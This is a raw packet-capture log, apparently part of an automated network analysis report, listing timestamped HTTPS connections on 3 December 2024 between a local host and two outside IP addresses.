                                                                                                                      Dec 3, 2024 08:55:56.201827049 CET44350097196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.702510118 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.703061104 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.703095913 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.703668118 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:56.703674078 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.759063959 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.759402990 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.759495974 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.760602951 CET50100443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.760620117 CET44350100196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.764328003 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.764355898 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.764446020 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.764693022 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.764707088 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.790018082 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.790040970 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.790141106 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:56.790164948 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:56.839401007 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:57.041743994 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.041754961 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.041847944 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:57.046317101 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.046385050 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.046392918 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:57.046431065 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:57.059376001 CET50099443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:57.059403896 CET44350099196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.081562042 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.082021952 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.082042933 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.082495928 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.082500935 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.129664898 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.130330086 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.130351067 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.130848885 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.130856037 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.156301022 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.159389019 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.159434080 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.159451008 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.159492016 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.159539938 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.159554005 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.159564018 CET50101443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.159569025 CET4435010113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.162494898 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.162530899 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.162609100 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.162738085 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.162751913 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.525811911 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.528911114 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.528954029 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.528987885 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.529027939 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.540055990 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.540075064 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.540085077 CET50103443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.540091038 CET4435010313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.541554928 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.543328047 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.543349028 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.543854952 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.543859959 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.546046972 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.546087027 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.546154976 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.546283960 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.546299934 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.583033085 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.586092949 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.586150885 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.586189985 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.586203098 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.586214066 CET50102443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.586220026 CET4435010213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.590367079 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.590403080 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.590476990 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.590627909 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.590641975 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.965410948 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.965981960 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.966005087 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.966464043 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.966469049 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.987027884 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.990648031 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.990709066 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.990767002 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.990777016 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.990791082 CET50104443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.990796089 CET4435010413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.993804932 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.993838072 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:57.993906975 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.994096994 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:57.994113922 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.418884039 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.422168970 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.422259092 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.422333956 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.422333956 CET50105443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.422350883 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.422358990 CET4435010513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.425426960 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.425462961 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.425533056 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.425679922 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.425693989 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.476602077 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.479789972 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:58.479808092 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.480206966 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.481005907 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:58.481081009 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.481170893 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:58.523334026 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.883172989 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.883810997 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.883831978 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:58.884310007 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:58.884314060 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.264266014 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.264851093 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.264873981 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.265348911 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.265353918 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.301105976 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.301455021 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.301507950 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:59.301875114 CET50106443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:59.301886082 CET44350106196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.323436022 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.323491096 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.323633909 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.323756933 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.323772907 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.323781013 CET50107443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.323786974 CET4435010713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.326895952 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.326927900 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.327014923 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.327197075 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.327213049 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.390403986 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.391150951 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.391165018 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.391644955 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.391649008 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.699620962 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.703083992 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.703157902 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.704036951 CET50108443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.704055071 CET4435010813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.714754105 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.714792967 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.714859009 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.715215921 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.715229988 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.783011913 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.786660910 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.786684990 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.787163019 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.787168026 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.836210966 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.839714050 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.839828014 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.841435909 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.841455936 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.841469049 CET50109443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.841475964 CET4435010913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.844588041 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.844619989 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:59.844696999 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.844866991 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:59.844876051 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.147222042 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.147847891 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.147866964 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.148344994 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.148351908 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.273412943 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.276463032 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.276525021 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.276679039 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.276695013 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.276706934 CET50110443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.276715040 CET4435011013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.280740976 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.280764103 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.280831099 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.280996084 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.281006098 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.581651926 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.585427999 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.585481882 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.585562944 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.585580111 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.585602045 CET50111443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.585609913 CET4435011113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.589349031 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.589381933 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:00.589454889 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.589601040 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:00.589612961 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.110481024 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.111141920 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.111176014 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.111641884 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.111646891 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.496315956 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.496943951 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.496967077 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.497457981 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.497463942 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.578079939 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581166029 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581224918 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.581243038 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581291914 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581337929 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.581365108 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581377983 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.581387997 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.581397057 CET50112443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.581402063 CET4435011213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.584517956 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.584558010 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.584629059 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.584788084 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.584805965 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.630532980 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.633214951 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.633249044 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.633722067 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.633728027 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.941678047 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.944713116 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.944791079 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.944823980 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.944844007 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.944855928 CET50113443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.944860935 CET4435011313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.948477983 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.948522091 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.948616982 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.948807955 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.948816061 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.995974064 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.996536016 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.996566057 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:01.997008085 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:01.997013092 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.073756933 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.076829910 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.076899052 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.076958895 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.076977968 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.076988935 CET50114443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.076996088 CET4435011413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.079941034 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.079996109 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.080081940 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.080249071 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.080265045 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.432326078 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.435453892 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.435543060 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.435604095 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.435623884 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.435633898 CET50115443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.435638905 CET4435011513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.435734987 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.436223030 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.436240911 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.436846972 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.436852932 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.438755989 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.438807011 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.438886881 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.439059019 CET50120443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.439080954 CET4435012013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890263081 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890285969 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890398979 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.890413046 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890625954 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.890638113 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890655041 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.890819073 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890853882 CET4435011613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.890908957 CET50116443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.893589020 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.893631935 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:02.893735886 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.893877029 CET50121443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:02.893893957 CET4435012113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.432519913 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.433087111 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.433135033 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.434032917 CET50117443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.434041023 CET4435011713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.728735924 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.731668949 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.731690884 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.732460976 CET50118443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.732467890 CET4435011813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.868222952 CET4435011913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:56:03.868756056 CET50119443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:56:03.868793964 CET4435011913.107.246.63192.168.2.4
